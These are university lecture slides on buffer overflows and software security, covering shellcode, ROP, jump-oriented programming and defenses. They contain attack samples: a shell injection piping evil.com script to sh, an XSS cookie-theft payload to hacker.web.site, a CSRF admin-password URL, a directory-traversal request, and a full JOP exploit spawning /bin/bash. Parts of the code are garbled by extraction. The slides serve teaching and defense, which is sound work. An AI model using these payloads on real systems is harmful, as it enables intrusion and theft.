ECE590 Computer and Information Security

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Buffer Overflows and Software Security

Tyler Bletsch Duke University

What is a Buffer Overflow?

- Intent
	- **Arbitrary code execution**
		- Spawn a remote shell or infect with worm/virus
	- Denial of service
- Steps
	- Inject attack code into buffer
	- Redirect control flow to attack code
	- Execute attack code

Table 10.1 A Brief History of Some Buffer Overflow Attacks


```
int main(int argc, char *argv[]) {
    int valid = FALSE: char str1[8];
     char str2[8];
    next_tag(str1);
     gets(str2);
    if (strncmp(str1, str2, 8) == 0)
        valid = TRUE;printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
}
```
(a) Basic buffer overflow C code

```
$ cc -g -o buffer1 buffer1.c 
$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
$ ./buffer1
BADINPUTBADINPUT
buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)
```
(b) Basic buffer overflow example runs

Figure 10.1 Basic Buffer Overflow Example

Figure 10.2 Basic Buffer Overflow Stack Values

Buffer Problem: Data overwrite

- **passwd** buffer overflowed, overwriting **passwd_ok** flag
	- Any password accepted!

Another Example: Code injection via function pointer

```
char buffer[100];
```

```
void (*func)(char*) = thisfunc;
```

```
strcpy(buffer, argv[1]);
```

```
func(buffer);
```


- Problems?
	- Overwrite function pointer
		- Execute code arbitrary code in buffer

Stack Attacks: Code injection via return address

- When a function is called…
	- **Perameters are pushed on stack**
	- **P** return address pushed on stack
	- called function puts local variables on the stack
- Memory layout

Return address Parameters Locals **arbitrarystuffX**

- Problems?
	- Return to address X which may execute arbitrary code

Demo

cool.c

```
#include <stdlib.h>
#include <stdio.h>
int main() {
     char name[1024];
     printf("What is your name? ");
     scanf("%s",name);
     printf("%s is cool.\n", name);
     return 0;
}
```
Demo – normal execution

Demo – exploit

How to write attacks

- Use NASM, an assembler:
	- Great for machine code and specifying data fields

Attack code trickery

- Where to put strings? No data area!
- You often can't use certain bytes
	- Overflowing a string copy? No nulls!
	- Overflowing a scanf %s? No whitespace!
- Answer: use code!
- Example: make "ebx" point to string "hi folks": **push "olks" ; 0x736b6c6f="olks" mov ebx, -"hi f" ; 0x99df9698 neg ebx ; 0x66206968="hi f" push ebx mov ebx, esp**

Shellcode

- Code supplied by attacker
	- Often saved in buffer being overflowed
	- Traditionally transferred control to a user command-line interpreter (shell)
- Machine code
	- Specific to processor and operating system
	- Traditionally needed good assembly language skills to create
	- More recently a number of sites and tools have been developed that automate this process
- Metasploit Project
	- Provides useful information to people who perform penetration, IDS signature development, and exploit research

Figure 10.4 Program Loading into Process Memory

Stack vs. Heap vs. Global attacks

• Book acts like they're different; they are not

Stack overflows

- Data attacks, e.g. "is admin" variable
- Control attacks, e.g. function pointers, return addresses, etc.

Non-stack overflows: heap/static areas

- Data attacks, e.g. "is admin" variable
- Control attacks, e.g. function pointers, etc.

Table 10.2

Some Common Unsafe C Standard Library Routines **Table 10.2 Some Common Unsafe C Standard Library Routines**

Also dangerous: all forms of **scanf** when used with unbounded %s!

Better:

Buffer Overflow Defenses

• Buffer overflows are widely exploited

Compile-Time Defenses: Programming Language

- Use a modern high-level language
	- Not vulnerable to buffer overflow attacks
	- Compiler enforces range checks and permissible operations on variables

Disadvantages

- •Additional code must be executed at run time to impose checks
- •Flexibility and safety comes at a cost in resource use
- •Distance from the underlying machine language and architecture means that access to some instructions and hardware resources is lost
- •Limits their usefulness in writing code, such as device drivers, that must interact with such resources

Compile-Time Defenses: Safe Coding Techniques

- C designers placed much more emphasis on space efficiency and performance considerations than on type safety
	- Assumed programmers would exercise due care in writing code
- Programmers need to inspect the code and rewrite any unsafe coding
	- An example of this is the OpenBSD project
- OpenBSD code base: audited for bad practices (including the operating system, standard libraries, and common utilities)
	- This has resulted in what is widely regarded as one of the safest operating systems in widespread use

```
int copy_buf(char *to, int pos, char *from, int len)
 {
    int i;
   for (i=0; i<len; i++) {
      to[pos] = from[i]; pos++;
\begin{matrix} \phantom{-} \end{matrix} return pos;
```
}

(a) Unsafe byte copy

```
short read_chunk(FILE fil, char *to)
{
    short len;
    fread(&len, 2, 1, fil);................................ .................. /* read length of binary data */
   fread(to, 1, len, fil); \dots /* read len bytes of binary data
    return len;
}
```
(b) Unsafe byte input

Figure 10.10 Examples of Unsafe C Code

Compile-Time Defenses: Language Extensions/Safe Libraries

- Handling dynamically allocated memory is more problematic because the size information is not available at compile time
	- o Requires an extension and the use of library routines
		- Programs and libraries need to be recompiled
		- Likely to have problems with third-party applications
- Concern with C is use of unsafe standard library routines
	- o One approach has been to replace these with safer variants
		- Libsafe is an example
		- Library is implemented as a dynamic library arranged to load before the existing standard libraries

Compile-Time Defenses: Stack Protection

• Add function entry and exit code to check stack for signs of corruption

• Use random canary

- o Value needs to be unpredictable
- o Should be different on different systems

- Stackshield and Return Address Defender (RAD)
	- o GCC extensions that include additional function entry and exit code
		- Function entry writes a copy of the return address to a safe region of memory
		- Function exit code checks the return address in the stack frame against the saved copy
		- If change is found, aborts the program

Preventing Buffer Overflows

- Strategies
	- Detect and remove vulnerabilities (best)
	- Prevent code injection
	- Detect code injection
	- **Prevent code execution**
- Stages of intervention
	- Analyzing and compiling code
	- **EXTE:** Linking objects into executable
	- **Exercutable into memory**
	- **Running executable**

Run-Time Defenses: Guard Pages

- Place guard pages between critical regions of memory
	- o Flagged in MMU as illegal addresses
	- o Any attempted access aborts process
- Further extension places guard pages Between stack frames and heap buffers

o Cost in execution time to support the large number of page mappings necessary

W^X and ASLR

Doesn't that solve everything?

- PaX: Linux implementation of ASLR & W^X
- Actual title slide from a PaX talk in 2003:

Negating ASLR

- ASLR is a probabilistic approach, merely increases attacker's expected work
	- Each failed attempt results in crash; at restart, randomization is different
- Counters:
	- Information leakage
		- Program reveals a pointer? Game over.
	- Derandomization attack [1]
		- Just keep trying!
		- 32-bit ASLR defeated in 216 seconds

Negating W^X

• Question: do we need malicious **code** to have malicious **behavior**?

No.

Code injection Code reuse (!)

"Return-into-libc" attack

Return-into-libc

- Return-into-libc attack
	- Execute entire libc functions
	- Can chain using "esp lifters"
	- Attacker may:
		- Use system/exec to run a shell
		- Use mprotect/mmap to disable W^X
		- Anything else you can do with libc
	- **Straight-line code only?**
		- Shown to be false by us, but that's another talk...

Arbitrary behavior with W^X?

- Question: do we need malicious **code** to have **arbitrary** malicious **behavior**? **No.**
- *Return-oriented programming (ROP)*
- Chain together *gadgets*: tiny snippets of code ending in ret
- Achieves Turing completeness
- Demonstrated on x86, SPARC, ARM, z80, ...
	- Including on a deployed voting machine, which has a non-modifiable ROM
	- Recently! New remote exploit on Apple Quicktime¹

Return-oriented programming (ROP)

• Normal software:

• Return-oriented program pointer

Figures taken from "Return-oriented Programming: Exploitation without Code Injection" by Buchanan et al.

Some common ROP operations

• Loading constants

· Arithmetic stack

• Control flow

0x8070abcd (address)

Figures adapted from "Return-oriented Programming: Exploitation without Code Injection" by Buchanan et al.

stack pointer

Bringing it all together

Figure taken from "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)" by Shacham

Defenses against ROP

- ROP attacks rely on the stack in a unique way
- Researchers built defenses based on this:
	- ROPdefender^[1] and others: maintain a shadow stack
	- **DROP**^[2] and DynIMA^[3]: detect high frequency rests
	- Returnless^[4]: Systematically eliminate all rests
- **So now we're totally safe forever, right?**
- **No: code-reuse attacks need not be limited to the stack and ret!**
	- **See "Jump-oriented programming: a new** class of code-reuse attack" by Bletsch et al. (covered in this deck if you're curious)

Software security in general
Software Security, Quality and Reliability

- Software quality and reliability:
	- o Concerned with the accidental failure of program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code
	- o Improve using structured design and testing to identify and eliminate as many bugs as possible from a program
	- o Concern is not how many bugs, but how often they are triggered

• Software security:

- o Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker
- o Triggered by inputs that differ dramatically from what is usually expected
- o Unlikely to be identified by common testing approaches

Defending against idiots Defending against attackers

Defensive Programming

- Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in
	- o Assumptions need to be validated by the program and all potential failures handled gracefully and safely

• Conflicts with business pressures to keep development times as short as possible to maximize market advantage

- Requires a changed mindset to traditional programming practices
	- o Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs

Developar giev profits 4 me!!!

Secure-by-design vs. duct tape

- Security a consideration from the start
- Security woven into *each* component

Security runs through everything

- Can't have a separate team that "does software security"
	- They never get the power they need
	- They don't write the code that will be broken
	- **Security is an** *emergent property*; can't be added from outside
- Everyone developing a product must understand basic security concepts
	- Security team is there to test, advise, and provide training, not "add in the security"

What to do when you walk into a security mess

Fixing a mess: psychological steps

- If you don't have **buy-in from top leadership**, YOU WILL PROBABLY FAIL
	- **Fight for the support you need (see next slide)**
	- If you can't get it, consider leaving the company
	- The saddest people I've known are security experts at insecure companies…they pretty much just log the existence of timebombs they don't get to defuse.
- Acknowledge that:
	- \blacksquare It will be painful
	- Yes, adding security takes time away from feature work
	- Devs may have to change their way of thinking
	- There is a trade-off between security and usability
- Keep everyone remembering the *concrete real risks*

Fixing a mess: psychological steps: *How to convince an executive*

- Words to use:
	- **Cost to fix vs. cost if unfixed**
	- Likelihood of risk & severity of risk
	- \blacksquare Cost to fix:
		- Human time
		- Opportunity cost of foregoing other features/fixes
	- Cost if unfixed:
		- Downtime
		- Loss of customer data
		- Damage to reputation
		- Actions of criminal attackers
		- Civil liability
		- Loss of sales
	- **Trade-off** against feature development and time-to-market
- If things are very toxic:
	- **Negligence**
	- **Duty to report**
	- Ethics board
- Words to avoid:
	- **Anything involving computers**

The executive mindset:

Maximize dollars

Change in dollars if we do X?

- Change in revenue
- Change in costs
- Opportunity cost

Fixing a mess: technical steps

Low-hanging fruit: Turn on and configure security features already available, and turn off dumb stuff:

- Use host-based firewalls
- Turn on encryption on protocols that support it (e.g. HTTP->HTTPS)
- Disable/uninstall unnecessary services
- Tighten permissions on all inter-communicating components (e.g. "your app doesn't have to log into the database as root")
- Install relevant security tools from elsewhere in the course (e.g. host/net-based IDS/IPS)
- Ensure there are no "fixed" passwords (e.g. every install of this app logs into its database with the password '9SlALfpY58jg')

Fixing a mess: technical steps

Fixing processes:

- Make the build process smart and automated (if it isn't already)
	- Code analysis tools (e.g. lint, style checker, etc.)
	- Automated testing (e.g. nightly build tests)
- Team dedicated to security test development and auditing
	- **Separate from the main developers!**
- Code reviews (fine grained, in-team)
- Code audits (coarse grained, separate team)
- Bad practice ratchets:
	- Yes there are 33 instances of strcpy() in the code, but there shall not be a single one more!
	- Enforce with automated code analysis at check-in
	- Cause code check-ins that violate the ratchet to FAIL code literally doesn't commit!
	- You must also have a team refactor the existing bad practices
		- Yes this could break old gnarly critical code, TOO BAD, that's where the vulnerabilities are likeliest!

Fixing a mess: technical steps

Identifying specific flaws:

- Penetration testing/code audit
	- If getting a contractor, research a ton and spend *real money*
		- Idiot security auditors are extremely common
- Short-term bug bounty
	- Why not long term? Because developers will start getting sloppy to generate bounties

Long-term re-architecting:

- Redesign the product in accordance with the principles of this course
- Phase in the changes over time
- Tie these changes to feature improvements to prevent them being cut by future short-sightedness

Specific software security practices

Handling input

- Identify all data sources
- Treat all input as dangerous
	- Explicitly **validate assumptions** on size and type of values before use
		- Numbers in **range**? Integer overflow? Negatives? Floating point effects?
		- Input not **too large**? Buffer overflow? Unbounded resource allocation?
		- Text input includes **non-text characters**?
		- **Unicode vs ASCII issues**?
			- Unicode has invisible characters, text-direction changing characters, and more! Also, what about stupid emojis????
		- Any **"special" characters**? The need for quoting/escaping...
			- For files, is **directory traversal** allowed (../../thing)?
				- Common bug in web apps: ask for ../../../../etc/passwd or similar
			- Danger of *injection attacks* (next slide)

Injection attacks

- When input is used in some form of code.
- Examples:
	- SQL injection ("SELECT FROM mydata WHERE X=\$input")
		- \$input = "; DROP TABLE mydata"
	- Shell injection ("whois -H \$domain")
		- δ domain = "; curl http://evil.com/script | sh"
	- Javascript injection ("Welcome, \$name!")
		- \$name = "<script>send_cookie_to_evil_domain();</script>"
- Solutions:
	- **Escape special characters** (e.g. ';', '<', etc.)
		- Used tested library function to do this don't guess!!
	- For SQL: Use **prepared statements**
		- SQL integration library fills in variables instead of you doing it
	- Better solution for SQL: Use a **Object-Relational Mapping**
		- Library generates *all* SQL, no chance for an injection vulnerability

Validating Input Syntax

- It is necessary to ensure that data conform with any assumptions made about the data before subsequent use
- Input data should be compared against what is
wanted (WHITE LIST)
A Yes, this is reasonable. wanted (**WHITE LIST**)

^ Yes, this is reasonable.

• Alternative is to compare the input data with known dangerous values (**BLACK LIST**)

^ No, bad text book! This is dumb!

Input Fuzzing

- Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989
- Software testing technique that uses randomly generated data as inputs to a program
	- o Range of inputs is very large
	- o Intent is to determine if the program or function correctly handles abnormal inputs
	- o Simple, free of assumptions, cheap
	- o Assists with reliability as well as security
- Can also use templates to generate classes of known problem inputs
	- o Disadvantage is that bugs triggered by other forms of input would be missed
	- o Combination of approaches is needed for reasonably comprehensive coverage of the inputs

Cross Site Scripting (XSS) Attacks

- Attacks where **input provided by one user** is subsequently **output to another user**
- Common in scripted Web applications
	- o Inclusion of script code in the HTML content
	- o Script code may need to access data associated with other pages
	- Browsers impose security checks and restrict data access to pages originating from the same site
- Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site
- XSS reflection vulnerability
	- o Attacker includes the malicious script content in data supplied to a site

```
Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>
```
(a) Plain XSS example

```
Thanks for this information, its great!
x#60; x#115; x#99; x#114; x#105; x#112; x#116; x#62;\frac{1}{2} a + 100; \frac{1}{2} + 111; \frac{1}{2} + 99; \frac{1}{2} + 117; \frac{1}{2} + 109; \frac{1}{2} + 101; \frac{1}{2} + 110; \frac{1}{2}& 446: 24108: 24111: 2499: 2497: 24116: 24105: 24111:x#110; x#61; x#39; x#104; x#116; x#116; x#112; x#58;& # 47; & # 47; & # 104; & # 97; & # 99; & # 107; & # 101; & # 114;
. w e b . s i t
\kappa#101; \kappa#47; \kappa#99; \kappa#111; \kappa#111; \kappa#107; \kappa#105; \kappa#101;
& 446; & 499; & 4103; & 4105; & 463; & 439; & 443; & 4100;\& #111; \& #99; \& #117; \& #109; \& #101; \& #110; \& #116; \& #46;
\kappa#99; \kappa#111; \kappa#111; \kappa#107; \kappa#105; \kappa#101; \kappa#60; \kappa#47;
\kappa#115; \kappa#99; \kappa#114; \kappa#105; \kappa#112; \kappa#116; \kappa#62;
```
(b) Encoded XSS example

Figure 11.5 XSS Example

Cross-Site Request Forgery (CSRF)

• In HTTP, the 'GET' transaction should not have side effects. Per [RFC 2616](https://tools.ietf.org/html/rfc2616):

"In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe"."

- When a web app has a GET request that has a side effect, anyone can link to it! Then...
	- **U** Victim user follows link
	- **Targeted site identifies victim user by cookie and assumes user intends to do** the action expressed by the link
- Example from uTorrent client: Change admin password http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladmin
- Fixes:
	- $#1:$ GET urls shouldn't do stuff
	- #2: Anything that does do stuff should have a challenge/response

Race condition

- Exploit multi-processing to take advantage of transient states in code
- Common example: **Time Of Check to Time Of Use** bug **(TOCTOU)**

- **How to exploit**: try a lot very fast, use debug facilities, etc.
- **Solutions**: Locking, transaction-based systems, drop privilege as needed

Environment variables

- Control a LOT of things implicitly
	- Examples:
		- PATH sets where named binaries are located
		- LD_PRELOAD forces a shared library to load no matter what, allowing overrides of standard functions (e.g. open/close/read/write)
		- HOME sets where the home directory is, so things writing to γ whatever can be made to write elsewhere
		- IFS sets what characters are allowed to separate words in a command (wow, that's tricky!)
- Need to make sure attacker can't change, especially when escalating privilege.
	- Example: If I have a legitimate setuid-root binary, but I can set PATH to my directory, then if that binary runs a program by name, it could be my version!
- Solution: Drop all environment and set manually during privilege escalation process
	- [See here for more](https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/environment-variables.html).

#!/bin/bash user=`echo \$1 | sed 's/@.*\$//'` grep \$user /var/local/accounts/ipaddrs

(a) Example vulnerable privileged shell script

```
#!/bin/bash
PATH="/sbin:/bin:/usr/sbin:/usr/bin"
export PATH
user=`echo $1 | sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
```
^ Can still exploit IFS variable (e.g. make it include '=' so the PATH change doesn't happen)

(b) Still vulnerable privileged shell script

Figure 11.6 Vulnerable Shell Scripts

Use of Least Privilege

• Privilege escalation

- o Exploit of flaws may give attacker greater privileges
- Least privilege
	- o Run programs with least privilege needed to complete their function
- Determine appropriate user and group privileges required
	- o Decide whether to grant extra user or just group privileges
- Ensure that privileged program can modify only those files and directories necessary

Software security miscellany

- **#1: Error check ALL calls, even ones you think "can't" fail**
- All code paths must be planned for!
- Avoid information leakage (especially in debug output!)
- Be wary of "serialization" (conversion of data structures to streams)
	- If data can include code (e.g. classes), bad input can yield arbitrary code
	- Tons of reported bugs in serialization.
		- Java now considers the Serializable interface to have been a *mistake*!
- Consider 'weird' versions of common things:
	- Weird files: FIFOs, device files, symlinks!
	- Weird URLs: URLs can include *any* scheme, including the 'data' schema that embeds the content right in the URL
	- Weird text: E.g., Unicode with all its extended abilities
	- Weird settings: Can make normal environments act in surprising ways (e.g. changing IFS)

Backup slides: My past research on code reuse attacks

"Jump-oriented Programming" (JOP)

Defenses against ROP

- ROP attacks rely on the stack in a unique way
- Researchers built defenses based on this:
	- $-$ ROPdefender^[1] and others: maintain a shadow stack
	- DROP^[2] and DynIMA^[3]: detect high frequency rests
	- $-$ Returnless^[4]: Systematically eliminate all $rest$
- **So now we're totally safe forever, right?**
- **No: code-reuse attacks need not be limited to the stack and ret!**
	- **My research follows...**

Jump-oriented programming (JOP)

Instead of $_{\text{ret}}$, use indirect jumps, e.g., $_{\text{imp}}$ eax

• How to maintain control flow?

The dispatcher in depth

• Dispatcher gadget implements:

pc = **f**(*pc*) goto **pc*

- **f** can be anything that evolves *pc* predictably
	- Arithmetic: **f**(*pc*) = *pc*+4
	- Memory based: **f**(*pc*) = *(*pc*+4)

Availability of indirect jumps (1)

- Can use $\frac{1}{2}$ or call (don't care about the stack)
- When would we expect to see indirect jumps? – Function pointers, some switch/case blocks, ...?
- That's not many...

vailability of indirect jumps (2)

- However: x86 instructions are *unaligned*
- We can find *unintended* code by jumping into the middle of a regular instruction!

• Very common, since they start with 0xFF, e.g. -1 = $0x$ FFFFFFFFF $-1000000 = 0 \times FFFOBDC0$

Finding gadgets

- Cannot use traditional disassembly,
	- Instead, as in ROP, scan & walk backwards
	- We find 31,136 potential gadgets in libc!
- Apply heuristics to find certain kinds of gadget
- Pick one that meets these requirements:
	- **Internal integrity**:
		- Gadget must not destroy its own jump target.
	- **Composability**:
		- Gadgets must not destroy subsequent gadgets' jump targets.

Finding dispatcher gadgets

• Dispatcher heuristic:

- The gadget must act upon its own jump target register
- Opcode can't be useless, e.g.: inc, xchg, xor, etc.
- $-$ Opcodes that overwrite the register (e.g. mov) instead of modifying it (e.g. add) must be self-referential
	- lea edx, [eax+ebx] isn't going to advance anything
	- lea edx, [edx+esi] could work
- Find a dispatcher that uses uncommon registers **add ebp, edi jmp [ebp-0x39]**
- Functional gadgets found with similar heuristics

Developing a practical attack

- Built on Debian Linux 5.0.4 32-bit x86
	- Relies solely on the included libc
- Availability of gadgets (31,136 total): **PLENTY**
	- **Dispatcher**: 35 candidates
	- **Load constant**: 60 pop gadgets
	- **Math/logic**: 221 add, 129 sub, 112 or, 1191 xor, etc.
	- **Memory**: 150 mov loaders, 33 mov storers (and more)
	- **Conditional branch**: 333 short adc/sbb gadgets
	- **Syscall**: multiple gadget sequences

The vulnerable program

- Vulnerabilities
	- String overflow
	- Other buffer overflow
	- String format bug
- Targets
	- Return address
	- Function pointer
	- C++ Vtable
	- Setjmp buffer
		- Used for non-local gotos
		- Sets several registers, including esp and eip

The exploit code (high level)

- Shellcode: launches /bin/bash
- Constructed in NASM (data declarations only)
- 10 gadgets which will:
	- Write null bytes into the attack buffer where needed
	- Prepare and execute an execve syscall
- Get a shell without exploiting a single $\text{ret}:$

The full exploit (1)

```
start:
 \overline{a}: Constants:
                                                                                                  Constants
                                                                                                   Constants Immediate values on the stack 3.
  libc:
                         equ 0xb7e7f000 ; Base address of libc in memory
 4 base:
                         equ 0x0804a008 : Address where this buffer is loaded
5 base mangled:
                         equ 0x1d4011ee ; 0x0804a008 = mangled address of this buffer
 6 initializer mangled: equ 0xc43ef491 ; 0xB7E81F7A = mangled address of initializer gadget
7 dispatcher:
                   equ 0xB7FA4E9E ; Address of the dispatcher gadget
8 buffer length: equ 0x100 ; Target program's buffer size before the jmpbuf.
9 shell:
                         equ Oxbffff8eb ; Points to the string "/bin/bash" in the environment
10 to null:
                         equ libc+0x7 ; Points to a null dword (0x00000000)
1112 ; Start of the stack. Data read by initializer gadget "popa":
                                        ; Delta for dispatcher; negative to avoid NULLs
13 popa0 edi: dd -4
14 popa0 esi: dd Oxaaaaaaaa
15 popa0 ebp: dd base+q start+0x39
                                         ; Starting jump target for dispatcher (plus 0x39)
16 popa0 esp: dd Oxaaaaaaaa
                                                                                                   Immediate values on the stack
17 popa0 ebx: dd base+to dispatcher+0x3e; Jumpback for initializer (plus 0x3e)
18 popa0 edx: dd Oxaaaaaaaa
19 popa0 ecx: dd Oxaaaaaaaa
20 popa0 eax: dd Oxaaaaaaaa
2122 ; Data read by "popa" for the null-writer gadgets:
23 popal edi: dd -4
                                        ; Delta for dispatcher
24 popal esi: dd base+to dispatcher ; Jumpback for gadgets ending in "jmp [esi]"
25 popal ebp: dd base+q00+0x39
                                        ; Maintain current dispatch table offset
26 popal esp: dd Oxaaaaaaaa
27 popal ebx: dd base+new eax+0x17bc0000+1 ; Null-writer clears the 3 high bytes of future eax
28 popal edx: dd base+to dispatcher ; Jumpback for gadgets ending "imp [edx]"
29 popal ecx: dd Oxaaaaaaaa
30 popal eax: dd -1
                                         ; When we increment eax later, it becomes 0
31
32 ; Data read by "popa" to prepare for the system call:
33 popa2 edi: dd -4
                                         ; Delta for dispatcher
                                         ; Jumpback for "jmp [esi+K]" for a few values of K
34 popa2 esi: dd base+esi addr
35 popa2 ebp: dd base+q07+0x39
                                         ; Maintain current dispatch table offset
36 popa2 esp: dd Oxaaaaaaaa
37 popa2 ebx: dd shell
                                        ; Syscall EBX = 1st execve arg (filename)
38 popa2 edx: dd to null
                                         ; Syscall EDX = 3rd execve arg (envp)
39 popa2 ecx: dd base+to dispatcher
                                         ; Jumpback for "jmp [ecx]"
40 popa2<sup>-</sup>eax: dd to null
                                         ; Swapped into ECX for syscall. 2nd execve arg (argv)
41
```
The full exploit (2)

42 : End of stack, start of a general data region used in manual addressing Jumpback for "jmp [esi-0xf]" 43 dd dispatcher Data 44 times OxB db 'X' $:$ Filler Data a Dispatch table Overflow 45 esi addr: dd dispatcher ; Jumpback for "imp [esi]" ; Jumpback for "imp [esi+0x4]" 46 dd dispatcher 47 times 4 db 'Z' : Filler 48 new eax: dd 0xEEEEEE0b ; Sets syscall EAX via [esi+0xc]; EE bytes will be cleared 49. 50 ; End of the data region, the dispatch table is below (in reverse order) 51 q0a: dd 0xb7fe3419 ; sysenter Dispatch table 52 q09: dd libo+ 0xla30d ; mov eax, [esi+0xc] ; mov [esp], eax ; call [esi+0x4] 53 $g08$: dd libc+0x136460 ; xchg ecx, eax ; fdiv st, st(3) ; imp [esi-0xf] 54 q07: dd libc+0x137375 ; popa $:$ cmc $:$; imp far dword [ecx] 55 $q06$: dd libc+0x14e168 ; mov [ebx-0x17bc0000], ah ; sto ; jmp [edx] ; fdivr $st(1)$, st ; \overline{jmp} [edx] 56 a05: dd libc+0x14748d ; inc ebx 57 $q04$: dd libc+0x14e168 ; mov [ebx-0x17bc0000], ah ; sto ; imp [edx] 58 q03: dd libc+0x14748d ; inc ebx ; fdivr st(1), st ; jmp [edx] 59 q02: dd libc+0x14e168 ; mov [ebx-0x17bc0000], ah ; sto ; imp [edx] 60 $q01$: dd libc+0x14734d ; inc eax ; fdivr $st(1)$, st ; jmp edx] 61 $q00$: dd libc+0x1474ed ; popa ; fdivr st(1), st ; jmp [edx] 62 q start: ; Start of the dispatch table, which is in reverse order. 63 times buffer length - (\$-start) db 'x' ; Pad to the end of the legal buffer 64 65 ; LEGAL BUFFER ENDS HERE. Now we overwrite the jmpbuf to take control Overflow 66 jmpbuf ebx: dd Oxaaaaaaaa 67 impbuf esi: dd Oxaaaaaaaa 68 impbuf edi: dd Oxaaaaaaaa 69 impbuf ebp: dd Oxaaaaaaaa 70 impbuf esp: dd base mangled ; Redirect esp to this buffer for initializer's "popa" 71 impbuf eip: dd initializer mangled ; Initializer gadget: popa ; imp [ebx-0x3e] 72 to dispatcher: dd dispatcher 73 ; Address of the dispatcher: add ebp, edi ; jmp [ebp-0x39] 74 dw 0x73 ; The standard code segment; allows far jumps; ends in NULL

Discussion

- Can we automate building of JOP attacks?
	- Must solve problem of complex interdependencies between gadget requirements

- Is this attack applicable to non-x86 platforms?
	- A: *Yes*
- What defense measures can be developed which counter this attack?

The **MIPS** architecture

- MIPS: very different from x86
	- Fixed size, aligned instructions
		- No unintended code!
	- Position-independent code via indirect jumps
	- Delay slots
		- Instruction after a jump will always be executed

• *We can deploy JOP on MIPS!*

- Use intended indirect jumps
	- Functionality bolstered by the effects of delay slots
- Supports hypothesis that JOP is a *general* threat

MIPS exploit code (high level overview)

- Shellcode: launches /bin/bash
- Constructed in NASM (data declarations only)
- 6 gadgets which will:
	- Insert a null-containing value into the attack buffer
	- Prepare and execute an execve syscall
- Get a shell without exploiting a single $j r$ ra:

[Click for full](#page-37-0) exploit code

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